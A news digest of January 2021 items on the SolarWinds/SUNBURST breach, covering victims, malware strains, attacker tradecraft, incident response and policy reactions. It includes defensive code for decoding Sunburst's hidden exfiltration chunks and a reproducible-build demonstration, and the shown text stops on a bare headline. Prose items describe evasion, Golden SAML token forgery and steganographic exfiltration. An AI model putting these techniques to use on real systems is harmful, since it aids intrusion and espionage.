Using the MITRE ATT&CK framework, researchers have provided the most likely technical attack flow of the SunBurst attack (the malware installed in SolarWinds’ Orion product). The chain of events included initial access (on-prem), discovery, credential access, privilege escalation, defense evasion, lateral movement, and finally exfiltration. Check Point researchers have revealed the details of each of these steps.


_______________________________________________________________________________________

(January 28, 2021)


Why does the SolarWinds breach matter so much?

The SolarWinds breach was like no other of its kind. The breach is almost endless in scale due to the implementation and usage of the compromised SolarWinds product and code across many organizations. This makes it one of the most powerful and successful hacks in history.

Ref - RedBit  

_______________________________________________________________________________________

(January 28, 2021)


SolarWinds hack proves that there is no ‘Finish Line’ with security

Stephen Ayoub, president of the solution provider powerhouse Ahead, has insisted that the massive SolarWinds hack has proved that there is no “finish line” to any organization’s cybersecurity strategy. Several other IT leaders across the board are echoing similar views regarding the SolarWinds hack.

Ref - CRN 

_______________________________________________________________________________________

(January 28, 2021)

The Story of a SolarWinds Attack Victim

Marcin Kleczynski, the chief executive officer of Malwarebytes, sheds some light on the series of quick and consequential decisions that hundreds of company and agency heads across the country have been forced to make in the aftermath of the SolarWinds breach by suspected Russian hackers.

Ref - Bloomberg

_______________________________________________________________________________________

(January 27, 2021)

CISA Malware Analysis on Supernova

CISA has released a malware analysis report on Supernova malware affecting unpatched SolarWinds Orion software. The report contains indicators of compromise (IOCs) and analyzes several malicious artifacts. Supernova is not part of the SolarWinds supply chain attack described in Alert AA20-352A.
 
Ref - US-CERT

_______________________________________________________________________________________

(January 27, 2021)


SolarWinds Attacks Highlight Advantage of Indicators of Behavior for Early Detection

The security community is not bound to protecting organizations using IOCs alone; it can turn to what’s known as Indicators of Behavior (IOBs). The malicious actors uniquely compiled their code to make sure it did not match any known file hashes or malware signatures, rendering IOCs ineffective for detection and leaving signature-based anti-malware solutions unable to catch it.


_______________________________________________________________________________________

(January 27, 2021)


Hardening Active Directory against SolarWinds-type attacks

The SolarWinds attackers took advantage of Active Directory to gain a foothold inside the targeted networks. There are several means within Microsoft’s Active Directory (AD) to identify the attack techniques used by the SolarWinds attackers and prevent them from succeeding. These include user account settings, domain password policies, Active Directory backup policies, and a few areas requiring attention, such as old Group Policy Preferences credentials.


_______________________________________________________________________________________

(January 27, 2021)


Hundreds of industrial organizations received Sunburst malware

Kaspersky’s industrial cybersecurity researchers have analyzed a list of nearly 2,000 domains impacted by Sunburst and estimated that roughly 32% of them were associated with industrial organizations. A majority of them are organizations in the manufacturing sector, followed by utilities, construction, transportation and logistics, oil and gas, mining, and energy.

Ref - SecurityWeek 

_______________________________________________________________________________________

(January 27, 2021)


Fidelis targeted by SolarWinds hackers via Orion

Fidelis has disclosed and confirmed that hq[.]fidelis is included in the growing list of domains known to have been targeted by the SolarWinds attackers. Fidelis had installed an evaluation copy of the trojanized SolarWinds Orion software on one of their machines in May 2020 as part of a software evaluation.


_______________________________________________________________________________________

(January 26, 2021)


Kaspersky researchers reveal SunBurst industrial victims

Kaspersky researchers have analyzed all available decoded internal domain names obtained from the DNS names generated by the SunBurst Domain Generation Algorithm (DGA), using publicly available lists and third-party lists. The geographical distribution of the industrial organizations is broad and covers almost the entire world, from North America to APAC.

Ref - Kaspersky

_______________________________________________________________________________________

(January 26, 2021)


Mimecast confirms SolarWinds' hackers breached company

Mimecast has confirmed that the threat actor accessed, and potentially exfiltrated, certain encrypted service account credentials created by customers hosted in the United States and the United Kingdom. Customers hosted in the United States and the United Kingdom have been advised to take precautionary steps to reset their credentials.

Ref - Mimecast 

_______________________________________________________________________________________

(January 26, 2021)


Four new victims disclosed in SolarWinds breach

As most experts predicted last month, the fallout from the SolarWinds supply chain attack is getting bigger as time passes and companies have had time to audit internal networks and DNS logs. Now, four new cybersecurity vendors, Mimecast, Palo Alto Networks, Qualys, and Fidelis, have added their names to the list of companies that installed trojanized versions of the SolarWinds Orion app.

Ref - ZDNet

_______________________________________________________________________________________

(January 26, 2021)


Can the SolarWinds breach be called an act of war?

Members of Congress on both sides of the aisle have posed the question of whether the recent SolarWinds cyberattack was an act of war. Democratic Sen. Dick Durbin and Republican Sen. Mitt Romney shared these concerns. States must recognize such an aggressive act for what it is and be prepared to respond to such threats in accordance with international law.

Ref - Lawfare 

_______________________________________________________________________________________

(January 26, 2021)


SolarWinds breach exposed significant weaknesses of incident response

The massive SolarWinds breach exposed some significant weaknesses in companies’ incident response practices. Lack of traffic analysis and behavior logs hinders the incident response team's ability to track down the source of the attack and shut it down, cut off the attackers' communication channels, and determine how far the attack has spread.


_______________________________________________________________________________________

(January 26, 2021)


Important lessons of the SolarWinds breach

The SolarWinds hack hasn’t really gotten the attention it deserves because it happened during the chaos after the presidential election, but it’s a big deal. And it raises a lot of questions about how to respond to such a massive attack and the responsibility of the private sector when it comes to national security.

Ref - The Verge

_______________________________________________________________________________________

(January 26, 2021)


SUNSPOT was used to inject the SUNBURST backdoor into the Orion app

An analysis revealed that the threat actors leveraged SUNSPOT to automatically inject the SUNBURST backdoor into the Orion app build process after carrying out the manual supply chain attack. The build system is software developers use to assemble smaller components into larger software applications. SUNSPOT was the third malware strain identified in the campaign, alongside SUNBURST (Solorigate) and TEARDROP.


_______________________________________________________________________________________

(January 26, 2021)


How the massive SolarWinds hack went down

The SolarWinds hack is, and continues to be, one of the biggest espionage campaigns recently discovered. Microsoft, Google, and several U.S. government agencies were among those compromised by the intrusion, and the repercussions of the SolarWinds hack are still being unraveled.

Ref - CNBC 

_______________________________________________________________________________________

(January 26, 2021)


SonicWall warns customers about zero-day vulnerabilities that may be linked to SolarWinds attacks

SonicWall has identified a coordinated attack on its internal systems by highly sophisticated threat actors. The attackers exploited probable zero-day vulnerabilities in certain SonicWall secure remote access products. Although there is currently no established link between the attack against SonicWall and the SolarWinds or Azure attacks, SonicWall is the third cybersecurity vendor to recently announce a security breach, after FireEye and Malwarebytes.

Ref - CSO Online 

_______________________________________________________________________________________

(January 25, 2021)


How should affected businesses respond to the SolarWinds hack?

The first thing businesses should do is make certain that their networks are as internally secure as possible. That means reconfiguring network assets to be as isolated as possible. They should also review employee security practices and procedures, conduct a limited security audit, and engage in defensive measures.


_______________________________________________________________________________________

(January 25, 2021)


Stage two of the SUNBURST backdoor revealed 23 more targets

According to researchers, the "STAGE2" flag in SUNBURST's DNS beacons can be used to reveal additional SUNBURST victims that were singled out as interesting targets by the threat actors. SUNBURST backdoors never made it past "Stage 1 operation", in which the backdoor encoded the internal AD domain name and the installed security products into DNS requests.

Ref - NETRESEC

_______________________________________________________________________________________

(January 25, 2021)


SolarWinds hack leaves security researchers clueless about future risks

The SolarWinds attackers have demonstrated sophistication and complex tradecraft in the intrusions. Out of hundreds of targeted organizations, it will take years to know for certain which networks the Russians control and which ones they just occupy. Although the consensus seems to be that the SolarWinds breach was straight-up reconnaissance, the truth is that it is yet not known if this was actually an attack or not.


_______________________________________________________________________________________

(January 25, 2021)


Qualys confirmed as one of the targets in SolarWinds attack

A researcher has released a list of 23 new, alleged targets of the unprecedented SolarWinds hacks that formed a huge espionage campaign first revealed in December. Amongst the confirmed newly-discovered targets are Qualys, a $5 billion market cap cybersecurity company on the Nasdaq, and the Virginia State Corporation Commission, which regulates businesses in the region.

Ref - Forbes

_______________________________________________________________________________________

(January 25, 2021)


Protecting businesses from supply chain attacks

SolarWinds attackers used a total of four malware strains: Sunspot, Sunburst (Solorigate), Teardrop, and Raindrop. These malware strains were used in a sophisticated sequence of escalated attacks. Security teams must scan their IT environments for all four of these strains of malware. In addition, organizations should take several additional security measures to reduce their exposure to risk.


_______________________________________________________________________________________

(January 25, 2021)


SolarWinds breach exposed supply chain weaknesses

The elite Russian hackers who gained access to computer systems of federal agencies last year didn't bother trying to break one by one into the networks of each department. Instead, they got inside by sneaking malicious code into a software update pushed out to thousands of government agencies and private companies.


_______________________________________________________________________________________

(January 25, 2021)


The Russian hack of US agencies exposed supply chain weaknesses

U.S. officials and cybersecurity experts have sounded the alarm for years about the problem behind the SolarWinds attack, which has caused havoc including billions of dollars in financial losses while defying easy solutions from the government and private sector. Part of the appeal of a supply chain attack for hackers is that it is "low-hanging fruit". U.S. organizations often do not appreciate or understand how dispersed their networks actually are.

Ref - StarTribune 

_______________________________________________________________________________________

(January 25, 2021)


SolarWinds, Mimecast hacks highlight risks of third-party, supply-chain compromises

The Mimecast hack provides a glimpse of threat actors innovating to take full advantage of fresh opportunities to maliciously manipulate digital certificates. Mimecast supplies email security systems to some 36,100 companies, many of which use Office 365 or G Suite. By either stealing or spoofing Mimecast’s certificate, the threat actors could gain access to inbound and outbound mail flows, intercept that traffic, and possibly infiltrate Mimecast customers’ Microsoft 365 Exchange Web Services as well.


_______________________________________________________________________________________

(January 24, 2021)


Lessons learned from SolarWinds breach

Three networking experts (Steve Garson, Tom Nolle, and Tom Hollingsworth) explored different lessons learned from SolarWinds. They provide guidance on how to shrink attack surfaces, on overlooked management and monitoring practices, and on how something seemingly harmless could lead to trouble.


_______________________________________________________________________________________

(January 22, 2021)


Disaster recovery steps after SolarWinds breach

For organizations that were affected by the SolarWinds breach, the first step would be to get the latest, sanitized updates of the Orion software. Next, they need to identify all of the systems that were impacted as well as those systems that interacted with them. They should evaluate DR plans to see whether there are contingencies for the impacted systems and what enacting them would involve. Finally, it would be prudent to rebuild all of the affected systems, as well as any systems that were connected to them, in order to ensure that any undetected presence of the malware is actually gone.

Ref - Petri

_______________________________________________________________________________________

(January 22, 2021)


The SolarWinds attack can affect control systems as well

Much of the initial discourse around the SolarWinds cyberattack focused on its impact on the affected Information Technology (IT) systems. However, this overlooks an equally destructive yet unexamined operational technology (OT) portion of the attack, and much of the OT impact may not be seen for months or longer. 

Ref - Lawfare

_______________________________________________________________________________________

(January 22, 2021)


SolarWinds hackers avoided reuse of attack infrastructures

The Sunburst espionage campaign that breached FireEye and several government agencies was devious about operational security. To protect useful attack vectors through SolarWinds, Microsoft, and VMware, the hackers made every effort not to reuse infrastructure or settings or to tie one stage of the attack to another.

Ref - SC Media

_______________________________________________________________________________________

(January 22, 2021)


How Sunburst sent data back to its operators

Sunburst uses randomly generated URL paths for HTTP(S) POST requests that differ from those used for HTTP(S) GET requests. Further, when the data is greater than 10,000 bytes, instead of sending the encrypted data directly, Sunburst steganographically embeds it in a faux JSON blob. On receipt, the attacker needs to decode and concatenate all the Message chunks, skipping the junk chunks in which the second bit of the Timestamp field is not set.
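The reassembly step described above, written from an analyst's side as an added example (not Symantec's or the malware's code): it pulls the Message fields of the real chunks out of a faux JSON blob and drops chunks whose Timestamp lacks the second bit. Only the Timestamp/Message fields and the second-bit rule come from the page; the outer "steps" array, the other field names and the sample blob are constructed here for illustration.

```python
"""Reassemble chunked data hidden in a Sunburst-style faux JSON blob.

The page states only that each chunk carries a Timestamp and a Message
and that junk chunks have the second bit of the Timestamp cleared. The
surrounding structure ("steps" list, extra telemetry-looking fields)
and the sample blob below are assumptions made for this example.
"""
import json
from typing import List, Tuple

# Second bit (value 0x2) of the Timestamp: set on real chunks, clear on junk.
REAL_CHUNK_BIT = 0x2


def is_real_chunk(timestamp: int) -> bool:
    """Return True when the chunk carries payload (second bit set)."""
    return bool(timestamp & REAL_CHUNK_BIT)


def reassemble(blob: str) -> Tuple[str, int, int]:
    """Concatenate the Message fields of real chunks in wire order.

    Returns (payload, real_chunk_count, junk_chunk_count) so an analyst
    can see how much of the blob was padding versus content.
    """
    doc = json.loads(blob)
    parts: List[str] = []
    junk = 0
    for step in doc["steps"]:          # "steps" list is an assumed layout
        if is_real_chunk(int(step["Timestamp"])):
            parts.append(step["Message"])
        else:
            junk += 1
    return "".join(parts), len(parts), junk


# Constructed sample blob dressed up as harmless telemetry. Timestamps that
# are 2 mod 4 have bit 0x2 set (real); 0 or 1 mod 4 do not (junk padding).
SAMPLE_BLOB = json.dumps({
    "userId": 1, "sessionId": "c0ffee",
    "steps": [
        {"Timestamp": 1608000002, "Index": 0, "EventType": "Orion", "Message": "PAY"},
        {"Timestamp": 1608000001, "Index": 1, "EventType": "Orion", "Message": "ZZZZ"},
        {"Timestamp": 1608000006, "Index": 2, "EventType": "Orion", "Message": "LOA"},
        {"Timestamp": 1608000008, "Index": 3, "EventType": "Orion", "Message": "QQQ"},
        {"Timestamp": 1608000010, "Index": 4, "EventType": "Orion", "Message": "D"},
    ],
})

if __name__ == "__main__":
    payload, real, junk = reassemble(SAMPLE_BLOB)
    print(f"real chunks={real} junk chunks={junk} payload={payload!r}")
```

In a real capture the concatenated payload is still the encrypted message and needs the malware's decoding step, which the page does not describe; this block stops at chunk selection and concatenation.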

Ref - Symantec

_______________________________________________________________________________________

(January 22, 2021)


FSB alerted Russian businesses about retaliation for the SolarWinds hack

The Russian intelligence agency FSB has issued a security alert this week warning Russian organizations of potential cyberattacks launched by the United States in response to the SolarWinds supply chain attack. The alert was issued after officials of the new Biden administration declared that attacks like the SolarWinds ones could trigger a response from their government.


_______________________________________________________________________________________

(January 21, 2021)


The attack timeline of the SolarWinds breach

According to the SolarWinds attack timeline, the attackers first accessed SolarWinds in September 2019 and injected test code about a week later. In November 2019, they stopped injecting test code. In February 2020, the Solorigate (SUNBURST) backdoor was compiled and deployed. In March, target profiling and distribution of SUNBURST started. In May, actual hands-on-keyboard attacks began and TEARDROP was activated. In June, the attackers removed the malware from the SolarWinds build environment. Hands-on-keyboard activity continued from then until December, when the supply-chain attack was discovered.


_______________________________________________________________________________________

(January 21, 2021)

How the SolarWinds hackers remained undetected

Microsoft's security researchers have outlined some of the operational security practices that allowed the SolarWinds hackers to remain undetected for so long. The hackers renamed their tools and binaries and placed them in folders that mimicked files and programs already present on the machine. They even created special firewall rules to minimize outgoing packets for certain protocols, and removed those rules after finishing reconnaissance.

Ref - ZDNet

_______________________________________________________________________________________

(January 21, 2021)


The SolarWinds hackers had put in painstaking planning to avoid detection

Microsoft researchers estimate that the SolarWinds attackers spent a month or so in selecting victims and preparing unique Cobalt Strike implants as well as command-and-control (C2) infrastructure. The attackers also tried to separate the Cobalt Strike loader's execution from the SolarWinds process in order to protect the Cobalt Strike implant. Each Cobalt Strike DLL implant was prepared to be unique per machine and avoided any overlap and reuse of folder name, file name, and other details.

Ref - ZDNet 

_______________________________________________________________________________________

(January 20, 2021)


Building the threat context for the SolarWinds incident

Blueliv has identified two vulnerabilities that affected SolarWinds Orion and could have been leveraged by the attackers: CVE-2020-14005 and CVE-2020-13169. Several severe ATT&CK patterns were also noted, particularly variations of Cross-Site Scripting (XSS) associated with these vulnerabilities.

Ref - Blueliv 

_______________________________________________________________________________________

(January 20, 2021)


Old-guard, ‘Cowboy IT’ caused the SolarWinds supply chain compromise

According to James Stanger, chief technology evangelist, CompTIA, most organizations continue to pursue traditional measures based on a firewall-first, signature-based, trusted-partner mindset. This mindset creates toxic IT solutions and leads to the practice of making IT and cybersecurity workers continually clean up after bad code, hastily implemented platforms, and poor business procedures.

Ref - SC Media

_______________________________________________________________________________________

(January 20, 2021)


Microsoft shares details on how hackers evaded detection in SolarWinds attack

Microsoft has shared details on how the SolarWinds hackers were able to remain undetected by hiding their malicious activity inside the networks of breached companies. The report shares new details regarding the Solorigate second-stage activation, including the steps and tools used to deploy custom Cobalt Strike loaders (Teardrop, Raindrop, and others) after dropping the Solorigate (Sunburst) DLL backdoor.


_______________________________________________________________________________________

(January 20, 2021)


More details regarding Solorigate second-stage activation revealed

Microsoft detailed the hands-on-keyboard techniques that attackers employed on compromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders, including the loader dubbed TEARDROP by FireEye and a variant named Raindrop by Symantec.

Ref - Microsoft

_______________________________________________________________________________________

(January 20, 2021)


Malwarebytes was targeted via Microsoft 365 API Calls

To target Malwarebytes, instead of using the SolarWinds Orion network-management system, the attackers had abused applications with privileged access to Microsoft Office 365 and Azure environments. The Microsoft Security Response Center flagged suspicious activity from a third-party email-security application used with Malwarebytes’ Microsoft Office 365 hosted service on Dec. 15.

Ref - Threatpost 

_______________________________________________________________________________________
 
(January 19, 2021)


SolarWinds attack has shown four separate paths to breach Microsoft 365 cloud

The perpetrators behind the SolarWinds supply-chain attack were observed leveraging four separate techniques to bypass identity and access management protections: the Golden SAML attack, which forges tokens using a stolen AD FS token-signing certificate; adding a new attacker-controlled federated Identity Provider (IdP) capable of forging tokens; compromising the credentials of highly privileged on-premises accounts that are synced to Microsoft 365; and adding rogue credentials to existing Azure AD applications or service principals and abusing the permissions those applications were legitimately assigned.

Ref - SC Media 

_______________________________________________________________________________________

(January 19, 2021)


SolarWinds hackers accessed internal emails of Malwarebytes 

Cybersecurity firm Malwarebytes confirmed that the threat actor behind the SolarWinds supply-chain attack was able to gain access to some company emails. The company did not find evidence of a compromise or unauthorized access to internal production or on-premises environments. The attackers exploited an Azure Active Directory weakness that allowed access to a limited subset of internal company emails.


_______________________________________________________________________________________

(January 19, 2021)


SolarWinds hackers used 7-Zip code to hide ‘Raindrop’

The ongoing analysis of the SolarWinds supply-chain attack uncovered a fourth malicious tool, which researchers call Raindrop and which was used to spread to other computers on the victim network. To hide the malicious functionality, the hackers compiled Raindrop as a DLL from a modified version of the 7-Zip source code.


_______________________________________________________________________________________

(January 19, 2021)


SolarWinds attack showed a new dimension in cyber-espionage tactics

The SolarWinds attack signals a new normal for cyber espionage. The campaign illustrates how nation-state attackers are going after real-time information and how hard it is for targeted organizations to detect them. With so much of the target data now living in Office 365 and Azure AD rather than on-premises, it adds a new dimension to nation-state hacking.


_______________________________________________________________________________________

(January 19, 2021)


Remediation and hardening strategies to defend against UNC2452

Recent research has disclosed the methodologies used by UNC2452 and other threat actors to move laterally from on-premises networks to the Microsoft 365 cloud. It also provides details about how organizations can proactively harden their environments and remediate environments where similar techniques have been observed.

Ref - FireEye

_______________________________________________________________________________________

(January 19, 2021)


Symantec researchers discover fourth malware strain used in SolarWinds attack

Researchers from cyber-security firm Symantec have identified another malware strain, dubbed Raindrop, that was used during the SolarWinds supply chain attack. The previously identified components are Sunspot, Sunburst (Solorigate), and Teardrop. Raindrop served as a loader for the Cobalt Strike Beacon, which the intruders then used to escalate and broaden their access inside a compromised network.

Ref - ZDNet
 
_______________________________________________________________________________________

(January 19, 2021)


Tactics used by the SolarWinds hackers may be copied by other groups as well

After the SolarWinds attack, researchers are bracing for a rise in the popularity of supply chain attacks among other threat actors, who tend to adopt whatever works. SAML token manipulation of the kind seen in the SolarWinds attack is a risk for virtually all cloud users that federate identity, not just those on Azure.

Ref - Wired 

_______________________________________________________________________________________

(January 18, 2021)


Planned supply chain attacks may have devastating effects

Well planned supply chain attacks can have a devastating real-world impact on a large number of organizations within the blast radius of the original compromise, like the case of the recent SolarWinds attacks. Detecting the SUNBURST backdoor implanted in SolarWinds Orion is difficult to accomplish with existing automated capabilities because the backdoor was delivered through a legitimate software update to a known monitoring and management tool. Many organizations do not keep access logs long enough to determine whether or not a successful compromise occurred.

Ref - Zscaler 

_______________________________________________________________________________________

(January 18, 2021)


Symantec discovers new Raindrop malware in SolarWinds investigation

Symantec has uncovered an additional piece of malware used in the SolarWinds attacks, which was used against a select number of victims that were of interest to the attackers. Raindrop (Backdoor.Raindrop) is a loader that delivers a payload of Cobalt Strike. Symantec has seen no evidence of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst.

Ref - Symantec 

_______________________________________________________________________________________

(January 18, 2021)


Google Cloud: We do use some SolarWinds, but we weren't affected by mega hack

Google Cloud's first chief information security officer (CISO), Phil Venables, has said that Google's cloud venture does use software from SolarWinds, but in a limited and contained manner. Beyond security layers such as Titan chips in Google host machines and Shielded Virtual Machines, Google also verifies that software is built and signed in an approved, isolated build environment from properly checked-in code that has been reviewed and tested.

Ref - ZDNet 

_______________________________________________________________________________________

(January 18, 2021)


SolarWinds hack is quickly reshaping Congress’s cybersecurity agenda

In the wake of the discovery of the SolarWinds breach, the incoming Biden administration committed to making cybersecurity a top priority. The Biden team has announced a Rescue Plan that calls for around $10 billion in cybersecurity spending, including $690 million for CISA to improve security monitoring and incident response at the agency.

Ref - CSO Online 

_______________________________________________________________________________________

(January 18, 2021)


New updates in Infinity SOC can pinpoint the presence of Sunburst infection

Check Point has updated its Infinity SOC offering, enabling it to pinpoint the presence of Sunburst indicators of compromise across a client's network. According to Check Point, administrators can use the cloud-based platform to search for Sunburst indicators within network, cloud, and endpoint environments. The solution also provides event investigation tools to drill down into findings, validate them, and plan remediation steps.

Ref - Check Point 

_______________________________________________________________________________________

(January 18, 2021)


Monetary Authority of Singapore (MAS) announces new rules for the financial sector after SolarWinds breach

All financial services and e-payment firms in Singapore must, from Jan 18, follow a new set of central banking rules to better mitigate technology risks in the wake of a recent cyberattack that impacted organizations around the world. MAS now requires all financial institutions to assess the suppliers of their technology vendors.


_______________________________________________________________________________________

(January 17, 2021)

Cyber threat intel analysis of SolarWinds' identified indicators of compromise

Owing to the scale of the SolarWinds breach, several cybersecurity organizations, principally FireEye, along with other companies such as Open Source Context, released lists of indicators of compromise (IoCs). A majority of the domain IoCs, 14 out of 18 to be exact, were first registered more than five years ago.

Ref - CircleID

_______________________________________________________________________________________

(January 15, 2021)


Some UW campuses could have been exploited in Solarwinds breach

The national cyberattack that targeted the SolarWinds network monitoring software could have impacted some University of Wisconsin (UW) System campuses that use it. UW System officials won't say which campuses use SolarWinds or whether they were impacted by the suspected Russian hack.

Ref - WPR

_______________________________________________________________________________________

(January 15, 2021)


Understanding third-party attacks after SolarWinds breach

The SolarWinds hack is just one example of a third-party, supply chain compromise. While the scale of the SolarWinds hack is certainly novel, third-party compromises are not. Moreover, third-party compromise is only one of six common root causes of breaches; the others are phishing, malware, unencrypted data, software vulnerabilities, and inadvertent employee mistakes.


_______________________________________________________________________________________

(January 15, 2021)


SolarWinds Orion vulnerability - SonicWall product notification

SonicWall Capture Labs threat researchers have investigated the SolarWinds Orion vulnerability. They published four signatures that identify malicious activity against affected SolarWinds Orion versions, and two additional application notifications that detect if an organization has SolarWinds Orion deployed within its network. These signatures are applied automatically to SonicWall firewalls with active security subscriptions.

Ref - SonicWall 

_______________________________________________________________________________________

(January 15, 2021)


SolarWinds fallout making secure communications the first line of defense

After the SolarWinds breach, operational security measures for sensitive communications have become a critical first line of defense. Keeping incident-response communications off potentially compromised systems lets enterprises and government agencies defend themselves against further compromise and establish strong, resilient crisis response plans to prevent and mitigate future intrusions.

Ref - FCW

_______________________________________________________________________________________

(January 15, 2021)

SolarWinds close to figuring out how cyberattack occurred

Austin-based SolarWinds, the software company at the center of what is considered one of the most sophisticated cyberattacks in U.S. history, said it believes it is closer to understanding how the attack was carried out. The company has reverse-engineered the code used in the attack to better understand how it was deployed.

Ref - GT

_______________________________________________________________________________________

(January 15, 2021)


SUNBURST - No one saw it coming

The attack on SolarWinds, dubbed Sunburst, loaded a Trojan into the SolarWinds Orion Platforms, thus compromising the networks of SolarWinds’ clients. US-based organizations were targets of nearly 80% of the attacks, though organizations based in other countries including Belgium, Canada, Israel, Mexico, Spain, and the UAE were also affected. Now organizations must consider that more threat actors are likely to mimic the success of the Sunburst attack.

Ref - NTT 

_______________________________________________________________________________________

(January 15, 2021)


SolarWinds attack - What has been done right and what has gone wrong

The “good” thing about SUNBURST is that it is written in .NET, which makes it relatively easy to decompile and see what the attacker programmed. There have also been responses that worked, such as Microsoft taking over the domain on which the whole first stage of the attack depends (avsvmcloud[.]com).


_______________________________________________________________________________________

(January 14, 2021)


Dell product response to SolarWinds

Dell has disclosed that the SolarWinds attack does not impact its products. In wake of the recent SolarWinds attacks, Dell has revealed that it does not embed or deliver the SolarWinds Orion software within any of its Dell or Dell EMC products.

Ref - Dell 

_______________________________________________________________________________________

(January 14, 2021)


SolarWinds SUNSPOT malware - Threat advisory

The developers of SUNSPOT were very careful in designing the malware, making sure the code would be inserted correctly and remain undetected. Once running, SUNSPOT spawns a thread that watches for the Orion software being built and, when it is, hijacks the build operation to inject SUNBURST into the source before compilation.

Ref - Cyber Florida  

_______________________________________________________________________________________

(January 14, 2021)


The SolarWinds attack poses a challenge for contractors

The SolarWinds incident could just as easily have occurred with a construction management company or general contractor using the construction industry’s various project management software programs. Such digital attacks can intercept sensitive information, divert funds, and hold hostage a company’s computer systems.


_______________________________________________________________________________________

(January 14, 2021)


Key lessons from SolarWinds attacks

The most important learning from the SolarWinds attack is that all computer systems are vulnerable to hacking. The second important learning is that security is not just about technology, but also about governance, policies, processes, and people. Thirdly, security should be baked into the software development life cycle and not be bolted on after the fact.

Ref - Forbes

_______________________________________________________________________________________

(January 14, 2021)


Analyzing SolarWinds exposure with Cisco Endpoint Security Analytics

While digging out of the SolarWinds mess, Cisco researchers were able to connect local Windows processes to domains that were reported in the IOC lists. Cisco Endpoint Security Analytics (CESA) allows users to associate which endpoint accessed which domain, as well as which software processes and protocols were used.

Ref - Cisco

_______________________________________________________________________________________

(January 14, 2021)


SolarWinds hack forces reckoning with supply-chain security

After working in recent weeks to assess their exposure to the attack on the software provider, businesses have turned to probing their other vendors’ security, re-evaluating vetting processes for partners, and even pausing updates to applications. The fallout from the SolarWinds hack is pressuring firms to more aggressively review their technology.

Ref - WSJ

_______________________________________________________________________________________

(January 14, 2021)


SolarWinds breach could cost cyber insurance firms around $90 million

Cyber insurance vendors are expected to spend $90 million on incident response and forensic services for clients who were compromised by the SolarWinds hackers. Although the SolarWinds attack is a cyber catastrophe from a national security perspective, insurers may have narrowly avoided a catastrophic financial incident to their businesses.

Ref - CRN

_______________________________________________________________________________________

(January 14, 2021)


How to avoid SolarWinds type attacks

The Linux Foundation has provided some suggestions on how to avoid SolarWinds type attacks. It includes hardening software build environments, moving towards verified reproducible builds, changing tools & interfaces so unintentional vulnerabilities are less likely, educating developers, using vulnerability detection tools when developing software, improving widely-used OSS, implementing OpenChain, and others.
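Of the Linux Foundation recommendations above, verified reproducible builds are the one that directly addresses the SUNSPOT technique described in the January 14 advisory entry (a build-host implant that swaps a source file while the product is being compiled): if an independent, uncompromised builder produces a bit-identical artifact from the same checked-in source, a build-time injection on the first builder shows up as a digest mismatch. The following is an added example, not code from the Linux Foundation, SolarWinds or any build tool, showing why that only works once the build output is deterministic. A "build" here is modelled as packaging a source tree into a zip archive (an assumption standing in for a real compiler), the two source trees with different checkout times are constructed, and SOURCE_DATE_EPOCH is the conventional pinned-timestamp mechanism that reproducible-build toolchains honor.

```python
import hashlib
import io
import os
import tempfile
import time
import zipfile
from pathlib import Path

SOURCE_DATE_EPOCH = 1577836800  # 2020-01-01T00:00:00Z, the pinned build timestamp (assumption)


def build_artifact(src_dir, deterministic):
    """Package src_dir into an archive. deterministic=True pins timestamps and ordering,
    deterministic=False leaks each file's mtime, as an unmodified packer would."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for p in sorted(q for q in src_dir.rglob("*") if q.is_file()):  # stable order
            if deterministic:
                stamp = time.gmtime(SOURCE_DATE_EPOCH)[:6]
            else:
                stamp = time.localtime(p.stat().st_mtime)[:6]
            info = zipfile.ZipInfo(p.relative_to(src_dir).as_posix(), date_time=stamp)
            info.compress_type = zipfile.ZIP_DEFLATED
            info.external_attr = 0o644 << 16  # fixed permissions, not the checkout's
            zf.writestr(info, p.read_bytes())
    return buf.getvalue()


def digest(artifact):
    return hashlib.sha256(artifact).hexdigest()


def make_source_tree(root, mtime, tamper=False):
    """Constructed two-file source tree. tamper=True simulates a SUNSPOT-style edit
    that the second builder's checkout does not contain."""
    src = root / "src"
    src.mkdir(parents=True)
    main = "class Program { static void Main() {} }\n"
    if tamper:
        main += "// extra code injected on the build host\n"
    (src / "Program.cs").write_text(main)
    (src / "Util.cs").write_text("static class Util {}\n")
    for p in root.rglob("*"):
        os.utime(p, (mtime, mtime))
    return root


def rebuild_and_compare(deterministic, tamper=False):
    """Build the same source on two 'builders' checked out at different times and
    return both digests; equality means the build reproduced."""
    with tempfile.TemporaryDirectory() as a, tempfile.TemporaryDirectory() as b:
        tree_a = make_source_tree(Path(a), mtime=1_580_000_000, tamper=tamper)  # compromised builder
        tree_b = make_source_tree(Path(b), mtime=1_610_000_000)                 # independent builder
        return (digest(build_artifact(tree_a, deterministic)),
                digest(build_artifact(tree_b, deterministic)))


def reproduced(deterministic, tamper=False):
    a, b = rebuild_and_compare(deterministic, tamper)
    return a == b


if __name__ == "__main__":
    print("non-deterministic build, clean source, reproduced:", reproduced(False))        # False
    print("deterministic build, clean source, reproduced:    ", reproduced(True))         # True
    print("deterministic build, injected source, reproduced: ", reproduced(True, True))   # False
```

The first case is the trap: with timestamps leaking into the artifact, the two builders disagree even on clean source, so a mismatch carries no information and nobody investigates it. Only once the clean case reproduces does the third case, where the first builder's source was altered at build time, become a detectable event rather than noise.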

Ref - ZDNet

_______________________________________________________________________________________

(January 14, 2021)


Increasing resilience against Solorigate and other sophisticated attacks with Microsoft Defender

According to Microsoft, Microsoft 365 Defender and Azure Defender deliver unified, intelligent, and automated security across domains, giving end-to-end threat visibility for SolarWinds-type attacks. With that comprehensive visibility and rich investigation tooling, the two products can also help organizations continuously improve their security posture.

Ref - Microsoft

_______________________________________________________________________________________

(January 14, 2021)


FireEye not ready to ascribe SolarWinds hack to Russia

The cybersecurity firm FireEye said Tuesday that it has not seen enough evidence to attribute the ongoing SolarWinds Orion hack to Russian entities. FireEye is credited as the first to detect the intrusion in SolarWinds Orion, an IT management product, but it is not yet attributing the attack to Russia.

Ref - FCW

_______________________________________________________________________________________

(January 13, 2021)


SolarLeaks website offering files allegedly obtained from SolarWinds breach 

Someone has set up a website named SolarLeaks offering to sell gigabytes of files allegedly obtained as a result of the recently disclosed SolarWinds breach. The site claims to offer source code taken from Microsoft, Cisco, SolarWinds, and FireEye.


_______________________________________________________________________________________

(January 13, 2021)

More SolarWinds victims are expected

